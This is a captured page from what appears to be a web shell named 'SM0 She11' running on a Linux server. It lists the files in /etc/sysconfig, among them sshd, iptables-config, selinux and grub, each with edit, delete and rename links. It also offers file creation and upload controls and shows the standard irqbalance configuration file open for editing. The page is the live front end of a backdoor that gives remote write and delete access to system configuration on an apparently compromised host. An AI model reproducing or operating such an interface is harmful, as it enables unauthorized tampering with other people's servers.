SM0 She11
Path:
/
/
etc
/
sysconfig
Full Path (server): /etc/sysconfig
Create Fil3
Upl04d Fil3
📄 anaconda
[E]
[D]
[R]
📄 atd
[E]
[D]
[R]
📄 authconfig
[E]
[D]
[R]
📁 cbq
Open
[D]
[R]
📄 chronyd
[E]
[D]
[R]
📁 console
Open
[D]
[R]
📄 cpupower
[E]
[D]
[R]
📄 crond
[E]
[D]
[R]
📄 freshclam
[E]
[D]
[R]
📄 garb
[E]
[D]
[R]
📄 grub
[E]
[D]
[R]
📄 init
[E]
[D]
[R]
📄 ip6tables-config
[E]
[D]
[R]
📄 iptables-config
[E]
[D]
[R]
📄 irqbalance
[E]
[D]
[R]
📄 kdump
[E]
[D]
[R]
📄 kernel
[E]
[D]
[R]
📄 man-db
[E]
[D]
[R]
📁 modules
Open
[D]
[R]
📄 named
[E]
[D]
[R]
📄 netconsole
[E]
[D]
[R]
📄 network
[E]
[D]
[R]
📁 network-scripts
Open
[D]
[R]
📄 qemu-ga
[E]
[D]
[R]
📄 rdisc
[E]
[D]
[R]
📄 readonly-root
[E]
[D]
[R]
📄 rpc-rquotad
[E]
[D]
[R]
📄 rpcbind
[E]
[D]
[R]
📄 rsyncd
[E]
[D]
[R]
📄 rsyslog
[E]
[D]
[R]
📄 run-parts
[E]
[D]
[R]
📄 sa-update
[E]
[D]
[R]
📄 saslauthd
[E]
[D]
[R]
📄 selinux
[E]
[D]
[R]
📄 snmpd
[E]
[D]
[R]
📄 snmptrapd
[E]
[D]
[R]
📄 spamassassin
[E]
[D]
[R]
📄 sshd
[E]
[D]
[R]
📄 svnserve
[E]
[D]
[R]
📄 sysstat
[E]
[D]
[R]
📄 sysstat.ioconf
[E]
[D]
[R]
📄 wpa_supplicant
[E]
[D]
[R]
Editing: irqbalance
# irqbalance is a daemon process that distributes interrupts across # CPUS on SMP systems. The default is to rebalance once every 10 # seconds. This is the environment file that is specified to systemd via the # EnvironmentFile key in the service unit file (or via whatever method the init # system you're using has. # # ONESHOT=yes # after starting, wait for a minute, then look at the interrupt # load and balance it once; after balancing exit and do not change # it again. #IRQBALANCE_ONESHOT= # # IRQBALANCE_BANNED_CPUS # 64 bit bitmask which allows you to indicate which cpu's should # be skipped when reblancing irqs. Cpu numbers which have their # corresponding bits set to one in this mask will not have any # irq's assigned to them on rebalance # #IRQBALANCE_BANNED_CPUS= # # IRQBALANCE_ARGS # append any args here to the irqbalance daemon as documented in the man page # #IRQBALANCE_ARGS=
Save